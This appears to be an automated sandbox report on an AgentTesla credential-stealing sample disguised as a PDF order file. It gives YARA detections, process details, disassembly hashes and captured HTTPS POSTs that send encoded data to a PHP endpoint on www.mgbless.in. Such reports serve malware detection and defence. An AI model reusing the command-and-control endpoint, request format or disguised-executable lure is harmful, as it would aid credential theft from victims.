                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.449779104.223.93.105443C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        TimestampkBytes transferredDirectionData
                        2021-11-25 11:19:37 UTC0OUTPOST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                        Content-Type: application/x-www-form-urlencoded
                        Host: www.mgbless.in
                        Content-Length: 366
                        Expect: 100-continue
                        Connection: Keep-Alive
                        2021-11-25 11:19:37 UTC0INHTTP/1.1 100 Continue
                        2021-11-25 11:19:37 UTC0OUTData Raw: 70 3d 76 71 62 7a 34 79 4b 6c 46 48 79 76 59 6d 2f 70 71 4f 78 62 70 68 66 41 45 56 53 7a 31 54 45 6a 70 43 49 4f 74 30 48 72 7a 35 42 4f 38 30 36 79 41 6f 64 6d 6c 30 75 69 31 53 78 74 59 49 6a 68 59 51 6d 2f 4a 47 58 39 2f 34 30 53 41 35 66 38 6a 62 45 64 75 62 33 30 6c 7a 61 5a 6a 45 37 7a 67 47 6b 25 32 42 4a 36 6e 78 33 35 51 52 64 79 57 55 53 37 6a 76 4f 55 56 64 58 6c 4a 4d 5a 36 51 30 73 63 4d 4c 4b 31 33 61 30 63 32 32 67 46 47 37 2f 4a 73 76 57 67 6c 4f 31 2f 76 49 6d 63 4a 61 4d 77 47 39 53 54 45 71 65 63 70 50 76 57 59 70 37 6e 25 32 42 71 73 36 68 52 70 4e 54 63 45 7a 66 71 79 30 5a 25 32 42 68 66 42 34 48 4b 6a 25 32 42 34 38 25 32 42 66 71 48 4d 71 69 5a 67 64 55 5a 42 53 72 36 7a 66 55 78 54 43 4f 4b 58 77 39 45 31 6b 67 77 62 56 42 54 2f
                        Data Ascii: p=vqbz4yKlFHyvYm/pqOxbphfAEVSz1TEjpCIOt0Hrz5BO806yAodml0ui1SxtYIjhYQm/JGX9/40SA5f8jbEdub30lzaZjE7zgGk%2BJ6nx35QRdyWUS7jvOUVdXlJMZ6Q0scMLK13a0c22gFG7/JsvWglO1/vImcJaMwG9STEqecpPvWYp7n%2Bqs6hRpNTcEzfqy0Z%2BhfB4HKj%2B48%2BfqHMqiZgdUZBSr6zfUxTCOKXw9E1kgwbVBT/
                        2021-11-25 11:19:38 UTC0INHTTP/1.1 200 OK
                        Date: Thu, 25 Nov 2021 11:19:37 GMT
                        Server: Apache
                        Connection: close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2021-11-25 11:19:38 UTC0INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.449843104.223.93.105443C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        TimestampkBytes transferredDirectionData
                        2021-11-25 11:20:39 UTC0OUTPOST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                        Content-Type: application/x-www-form-urlencoded
                        Host: www.mgbless.in
                        Content-Length: 362
                        Expect: 100-continue
                        2021-11-25 11:20:39 UTC1INHTTP/1.1 100 Continue
                        2021-11-25 11:20:39 UTC1OUTData Raw: 70 3d 4f 39 75 62 6f 2f 47 35 47 47 69 76 59 6d 2f 70 71 4f 78 62 70 68 66 41 45 56 53 7a 31 54 45 6a 70 43 49 4f 74 30 48 72 7a 35 42 4f 38 30 36 79 41 6f 64 6d 6c 30 75 69 31 53 78 74 59 49 6a 68 59 51 6d 2f 4a 47 58 39 2f 34 30 53 41 35 66 38 6a 62 45 64 75 62 33 30 6c 7a 61 5a 6a 45 37 7a 67 47 6b 25 32 42 4a 36 6e 78 33 35 51 52 64 79 57 55 53 37 6a 76 4f 55 56 64 58 6c 4a 4d 5a 36 51 30 73 63 4d 4c 4b 31 33 61 30 63 32 32 67 46 47 37 2f 4a 73 76 57 67 6c 4f 31 2f 76 49 6d 63 4a 61 4d 77 47 39 53 54 45 71 65 63 70 50 76 57 59 70 37 6e 25 32 42 71 73 36 68 52 70 4e 54 63 45 7a 66 71 25 32 42 70 6b 5a 51 4e 68 49 65 46 42 45 59 77 55 71 37 4c 35 54 74 5a 67 64 55 5a 42 53 72 36 7a 66 55 78 54 43 4f 4b 58 77 39 45 31 6b 67 77 62 56 42 54 2f 6a 50 4b 6a
                        Data Ascii: p=O9ubo/G5GGivYm/pqOxbphfAEVSz1TEjpCIOt0Hrz5BO806yAodml0ui1SxtYIjhYQm/JGX9/40SA5f8jbEdub30lzaZjE7zgGk%2BJ6nx35QRdyWUS7jvOUVdXlJMZ6Q0scMLK13a0c22gFG7/JsvWglO1/vImcJaMwG9STEqecpPvWYp7n%2Bqs6hRpNTcEzfq%2BpkZQNhIeFBEYwUq7L5TtZgdUZBSr6zfUxTCOKXw9E1kgwbVBT/jPKj
                        2021-11-25 11:20:39 UTC1INHTTP/1.1 200 OK
                        Date: Thu, 25 Nov 2021 11:20:39 GMT
                        Server: Apache
                        Connection: close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2021-11-25 11:20:39 UTC1INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.449846104.223.93.105443C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        TimestampkBytes transferredDirectionData
                        2021-11-25 11:20:52 UTC1OUTPOST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                        Content-Type: application/x-www-form-urlencoded
                        Host: www.mgbless.in
                        Content-Length: 376
                        Expect: 100-continue
                        Connection: Keep-Alive
                        2021-11-25 11:20:53 UTC1INHTTP/1.1 100 Continue
                        2021-11-25 11:20:53 UTC1OUTData Raw: 70 3d 47 78 42 77 34 58 68 59 68 58 69 76 59 6d 2f 70 71 4f 78 62 70 68 66 41 45 56 53 7a 31 54 45 6a 70 43 49 4f 74 30 48 72 7a 35 42 4f 38 30 36 79 41 6f 64 6d 6c 30 75 69 31 53 78 74 59 49 6a 68 59 51 6d 2f 4a 47 58 39 2f 34 30 53 41 35 66 38 6a 62 45 64 75 62 33 30 6c 7a 61 5a 6a 45 37 7a 67 47 6b 25 32 42 4a 36 6e 78 33 35 51 52 64 79 57 55 53 37 6a 76 4f 55 56 64 58 6c 4a 4d 5a 36 51 30 73 63 4d 4c 4b 31 33 61 30 63 32 32 67 46 47 37 2f 4a 73 76 57 67 6c 4f 31 2f 76 49 6d 63 4a 61 4d 77 47 39 53 54 45 71 65 63 70 50 76 57 59 70 37 6e 25 32 42 71 73 36 68 52 70 4e 54 63 45 7a 66 71 30 57 71 35 62 71 68 58 50 69 45 46 30 59 62 62 54 70 56 57 74 35 67 64 55 5a 42 53 72 36 7a 66 55 78 54 43 4f 4b 58 77 39 45 31 6b 67 77 62 56 42 54 2f 6a 50 4b 6a 67 53
                        Data Ascii: p=GxBw4XhYhXivYm/pqOxbphfAEVSz1TEjpCIOt0Hrz5BO806yAodml0ui1SxtYIjhYQm/JGX9/40SA5f8jbEdub30lzaZjE7zgGk%2BJ6nx35QRdyWUS7jvOUVdXlJMZ6Q0scMLK13a0c22gFG7/JsvWglO1/vImcJaMwG9STEqecpPvWYp7n%2Bqs6hRpNTcEzfq0Wq5bqhXPiEF0YbbTpVWt5gdUZBSr6zfUxTCOKXw9E1kgwbVBT/jPKjgS
                        2021-11-25 11:20:53 UTC2INHTTP/1.1 200 OK
                        Date: Thu, 25 Nov 2021 11:20:52 GMT
                        Server: Apache
                        Connection: close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2
                        []
                        2021-11-25 11:20:53 UTC2INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:12:19:04
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe"
                        Imagebase:0xdf0000
                        File size:526848 bytes
                        MD5 hash:7FB080A6AA45B1AC87C003E3F84A2983
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, Author: Joe Security
                        Reputation:low

                        General

                        Start time:12:19:07
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Imagebase:0x3e0000
                        File size:526848 bytes
                        MD5 hash:7FB080A6AA45B1AC87C003E3F84A2983
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        General

                        Start time:12:19:08
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
                        Imagebase:0x8c0000
                        File size:526848 bytes
                        MD5 hash:7FB080A6AA45B1AC87C003E3F84A2983
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.915300159.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.916801544.0000000002E62000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.657499770.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.658122914.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.656873284.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp, Author: Joe Security
                        Reputation:low

                        Disassembly

                        Code Analysis

                        Reset < >

                          Executed Functions

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.660852200.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: 48#m$48#m$U$d$d
                          • API String ID: 0-1502952366
                          • Opcode ID: 27b971b0f12056e7121c0f896b0b3880bf27c38dc9e8ad2e7edfc4114fbe38e2
                          • Instruction ID: feffdc62105aa6d885035c78ea4c2d19f515072f0f4cc1f10c7037c9d6065043
                          • Opcode Fuzzy Hash: 27b971b0f12056e7121c0f896b0b3880bf27c38dc9e8ad2e7edfc4114fbe38e2
                          • Instruction Fuzzy Hash: 46C25034B00218CFDB18DFA4D855AA9B7B6FF89305F1085A9E9099B355DB34ED82CF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.660852200.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25865204d32d7c6c4a0741889ada81158201d051e0c5a18677406e3b51166022
                          • Instruction ID: 1dd5e9650b112e7b0bac00ee9874aa45bba99e72e5f91a0b2c8ed9bed34bb19a
                          • Opcode Fuzzy Hash: 25865204d32d7c6c4a0741889ada81158201d051e0c5a18677406e3b51166022
                          • Instruction Fuzzy Hash: C502F031E043198FDF15DF68CC846BDBBAEAF86204F058429E856DB395CB38DD458B92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 01694522
                          Memory Dump Source
                          • Source File: 00000000.00000002.660852200.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: 196f55e848148a0d74c41ac5d889cbbe7675351c1d85eb10e026778514dccfff
                          • Instruction ID: 2feb6b9272a49854e81b8d3c8ef45806c7541793c0e5c21ae74df612ae20bf12
                          • Opcode Fuzzy Hash: 196f55e848148a0d74c41ac5d889cbbe7675351c1d85eb10e026778514dccfff
                          • Instruction Fuzzy Hash: 962188718003048FCF50DFA9D94A39EBFF8EB48328F508429D815A2601CB78A545CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 016947CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.660852200.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: 14ecd17bd09a0568633341a267ae51644581a1876fd1ae638ad42315c9174d47
                          • Instruction ID: 5da68c1c711e7812e259fe74621f751bcd98783cbd929740b6bab4ea5e2a784e
                          • Opcode Fuzzy Hash: 14ecd17bd09a0568633341a267ae51644581a1876fd1ae638ad42315c9174d47
                          • Instruction Fuzzy Hash: 02215B7481434D8FCF10CF98DA487AEBFF8EB09318F14442AE804E7242DB79A545CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 01694522
                          Memory Dump Source
                          • Source File: 00000000.00000002.660852200.0000000001690000.00000040.00000001.sdmp, Offset: 01690000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: 29e3317204d286601927af3f2996aa199694737557356d6b2780ab843e8529b0
                          • Instruction ID: f642c9e17a7e40b10c96fa3831a3dae1f9c257ac66b57c82fb3b6757a681a8f6
                          • Opcode Fuzzy Hash: 29e3317204d286601927af3f2996aa199694737557356d6b2780ab843e8529b0
                          • Instruction Fuzzy Hash: AF118670901309CFCF50EFA9DA4A79ABBF8FB48328F108429D815A3701CB79A545CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.660758181.000000000162D000.00000040.00000001.sdmp, Offset: 0162D000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dae37a339d68c98c6074565f2f1ce5805f54248e946ec9c2675f3de0eb79d427
                          • Instruction ID: a4c399810201ee747701267b1bedcf0691461adc788d989658af60ad3cc8a785
                          • Opcode Fuzzy Hash: dae37a339d68c98c6074565f2f1ce5805f54248e946ec9c2675f3de0eb79d427
                          • Instruction Fuzzy Hash: 9E210375504690DFDF11CF94DCC0F66BB66FB84328F248569E8090B346C33AD846CAA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.660783826.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f97ae8b46212a6043ff5775458d8c8e8556c5e3b2772943016a05ae5d134ab66
                          • Instruction ID: 4802e776bbeb01f22013c8fad77b57c12438902afc794d7696720bd58d2e0b5c
                          • Opcode Fuzzy Hash: f97ae8b46212a6043ff5775458d8c8e8556c5e3b2772943016a05ae5d134ab66
                          • Instruction Fuzzy Hash: 11212271604200DFCB11CFA4D8C0B26FBA5FB84754F60C96DE84A4B346C33AD847CAA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.660758181.000000000162D000.00000040.00000001.sdmp, Offset: 0162D000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b4768df47c0c72382ddcae975d869f3692393f3f4822e6597009969694e5ed2
                          • Instruction ID: f0eb20d7feea69ae10a94d4af0514f697f9605f933bc71fd1b11f2d3712bbc65
                          • Opcode Fuzzy Hash: 9b4768df47c0c72382ddcae975d869f3692393f3f4822e6597009969694e5ed2
                          • Instruction Fuzzy Hash: 9B11AC76504680CFCB12CF54D9C4B16BF72FB84324F2886A9D8494B656C33AD45ACBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.660783826.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 02bebd1ad1059daef5823bcb3edbd0edeb81f2d3ae348f5388953b032c5b855e
                          • Instruction ID: 43ee79ed4c37263ceec2d45847d00d9e3c386f12813581718f4c9e1857614234
                          • Opcode Fuzzy Hash: 02bebd1ad1059daef5823bcb3edbd0edeb81f2d3ae348f5388953b032c5b855e
                          • Instruction Fuzzy Hash: 9411DD75504280CFCB12CF54D9C4B16FFA2FB84724F28C6AAD8494B756C33AD44ACBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.660758181.000000000162D000.00000040.00000001.sdmp, Offset: 0162D000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 50f399dfba64e1c9a08c3b38939b1b9b62d86ffe0fc87aaf10481d115eb575a6
                          • Instruction ID: a14a845faf655a8cce685a7eabbceb7baea23f804d4173fbe791284366d75afa
                          • Opcode Fuzzy Hash: 50f399dfba64e1c9a08c3b38939b1b9b62d86ffe0fc87aaf10481d115eb575a6
                          • Instruction Fuzzy Hash: 3901F771904B50AEE7108E95CC847A7FB9CDF45668F08845AFD445A347C3799444CEB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.660758181.000000000162D000.00000040.00000001.sdmp, Offset: 0162D000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff76750e1cc4331e32a77950ee286fafaa34ee5f2b1817196ffe177ff11fb8fe
                          • Instruction ID: 7420aebf37d77756a6e7ac8a625454261eed314492d1a9ad630839c301e1ac4f
                          • Opcode Fuzzy Hash: ff76750e1cc4331e32a77950ee286fafaa34ee5f2b1817196ffe177ff11fb8fe
                          • Instruction Fuzzy Hash: 7BF0AF71404684AEEB108A4ADC84BA3FF98EB45664F18C45AED485A386C3799844CAA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Executed Functions

                          Memory Dump Source
                          • Source File: 00000005.00000002.915652564.0000000000E40000.00000040.00000010.sdmp, Offset: 00E40000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e6c82ae3955a389a8353a95a9eff7bb7db41393f7f616e59c419706ede5b4e3c
                          • Instruction ID: f30f364ba6d2bd5517a213bb94b5f98d4a8c4ca091b005ff22c85da91056932e
                          • Opcode Fuzzy Hash: e6c82ae3955a389a8353a95a9eff7bb7db41393f7f616e59c419706ede5b4e3c
                          • Instruction Fuzzy Hash: 2CF14B34A00209CFDB14DFA5D988B9DBBF1BF88318F149569E409BB2A5DB74E945CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: b8f50eae28c9fbe3d7261e0be599284a80e736e52749bf5fcdb948b22a34ab6a
                          • Instruction ID: e325392826af38c9a129b0d7aae341d579f3f4e33005f179a44ef1633e2dd698
                          • Opcode Fuzzy Hash: b8f50eae28c9fbe3d7261e0be599284a80e736e52749bf5fcdb948b22a34ab6a
                          • Instruction Fuzzy Hash: B5518171E002059FCB14EBB4D854AEEB7B5BF84304F148929E656EB385DF70A855CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 011669A0
                          • GetCurrentThread.KERNEL32 ref: 011669DD
                          • GetCurrentProcess.KERNEL32 ref: 01166A1A
                          • GetCurrentThreadId.KERNEL32 ref: 01166A73
                          Memory Dump Source
                          • Source File: 00000005.00000002.916117055.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 0c01f400f4861a0ab68e082e3897c3c57329a9ba060bb382d22cab1ff05277df
                          • Instruction ID: 731dfee2e1837e9c5eb772b7a79910c22764e00e35957b55793d9cc84ad61656
                          • Opcode Fuzzy Hash: 0c01f400f4861a0ab68e082e3897c3c57329a9ba060bb382d22cab1ff05277df
                          • Instruction Fuzzy Hash: F351CBB09047848FDB15CFA9C988BEEBFF1EF4A304F14859ED449AB2A1C7745845CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 011669A0
                          • GetCurrentThread.KERNEL32 ref: 011669DD
                          • GetCurrentProcess.KERNEL32 ref: 01166A1A
                          • GetCurrentThreadId.KERNEL32 ref: 01166A73
                          Memory Dump Source
                          • Source File: 00000005.00000002.916117055.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: e88ba43400ce2bb7c73a97f1f58ef3d3dd8752bef32e3f2deca06b64dd214719
                          • Instruction ID: df1dab3d190834f8ff503a0d5cbac1c373ae67fa1d15bcddae2c237c51c2e26f
                          • Opcode Fuzzy Hash: e88ba43400ce2bb7c73a97f1f58ef3d3dd8752bef32e3f2deca06b64dd214719
                          • Instruction Fuzzy Hash: 345173B49006488FDB18CFAAD688BEEBBF5AF88304F208559E409B7350D7756984CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1E740
                          • UserClientDllInitialize.USER32 ref: 00E1E77E
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: e4c1b4338cc3fdc2d03f9ed77b5316ee0a3f647def94c40b84c09cd238b833e3
                          • Instruction ID: 97202544b0f7bd66ff3c29465dcbf475626a306f341bbe5f6817f66edf3ac836
                          • Opcode Fuzzy Hash: e4c1b4338cc3fdc2d03f9ed77b5316ee0a3f647def94c40b84c09cd238b833e3
                          • Instruction Fuzzy Hash: 9281F330B093819FD746A7B898186AA7FF2AB96304F1580F7E544EB3D7EA24CC49C751
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E12DB0
                          • UserClientDllInitialize.USER32 ref: 00E12DEE
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 5fe013c79560ad17166fd5bc8f1b5104e61c023e914603ce1f9c47176347d6fd
                          • Instruction ID: 864fffad91a53db95afbeb49f719569007cfe1c0d82f55de4c056345df1001d8
                          • Opcode Fuzzy Hash: 5fe013c79560ad17166fd5bc8f1b5104e61c023e914603ce1f9c47176347d6fd
                          • Instruction Fuzzy Hash: C3419131B083458FC746EB78DC146DE7BF1AF9A304B1585AAD204EB3A6EB289D06C751
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E11F40
                          • UserClientDllInitialize.USER32 ref: 00E11F7E
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 3f6f1852fc6cff843f0a1fee60eb6748383f6c59011647865705bc754b6d0dd5
                          • Instruction ID: c12d4a97921c45abef358fecca608105eeda3b562e18b415277ac34ab63d0594
                          • Opcode Fuzzy Hash: 3f6f1852fc6cff843f0a1fee60eb6748383f6c59011647865705bc754b6d0dd5
                          • Instruction Fuzzy Hash: 1F31D531B043459FC741E7B88414AEE7BF1AF8A304B1584BAD508EB396EB349C46C751
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E122D8
                          • UserClientDllInitialize.USER32 ref: 00E12316
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 7ae8dc4984b8e33dd40bd3dc54e49b74ada0a976aa3e739809625bab4ef37064
                          • Instruction ID: 2ba6c58a68f5f956f616fdab4e5f0ed2fe1bd9acf875fdbaa8b09d45d1de3f33
                          • Opcode Fuzzy Hash: 7ae8dc4984b8e33dd40bd3dc54e49b74ada0a976aa3e739809625bab4ef37064
                          • Instruction Fuzzy Hash: B731F731F042459FCB41EBB8E845ADE7BF1AB89314F1484BAD609E7356EB389C46C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1E860
                          • UserClientDllInitialize.USER32 ref: 00E1E89E
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 37efcb087c848dc924a750774892c30e7a14435a3e51ea580eae37f0117f641a
                          • Instruction ID: 6c5a60a95c92c5d03a26d966e9721253294326f89822036397c25aaf681d794e
                          • Opcode Fuzzy Hash: 37efcb087c848dc924a750774892c30e7a14435a3e51ea580eae37f0117f641a
                          • Instruction Fuzzy Hash: C231C431F002458FC749E778D4159ED7BF1AB89310B2480BAE509EB396EA34AC46C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E1E980
                          • UserClientDllInitialize.USER32 ref: 00E1E9BE
                          Memory Dump Source
                          • Source File: 00000005.00000002.915572976.0000000000E10000.00000040.00000010.sdmp, Offset: 00E10000, based on PE: false
                          Similarity
                          • API ID: ClientInitializeUser
                          • String ID:
                          • API String ID: 4216687631-0
                          • Opcode ID: 8c760febecef0a51adc0107d90fcbc8dd2101b95a167379e7c70b5cdab6bed40
                          • Instruction ID: a4448bc5f5f923da1d02970e658715a21c97a9443e3263a14c1c0d56d14aee32
                          • Opcode Fuzzy Hash: 8c760febecef0a51adc0107d90fcbc8dd2101b95a167379e7c70b5cdab6bed40
                          • Instruction Fuzzy Hash: A121D730F002459FCB45EBB8D8159EEBBF5AF89300B1480B6E548E7355EB349C458790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • UserClientDllInitialize.USER32 ref: 00E12ED0
                          • UserClientDllInitialize.USER32 ref: 00E12F0E
                          Memory Dump Source
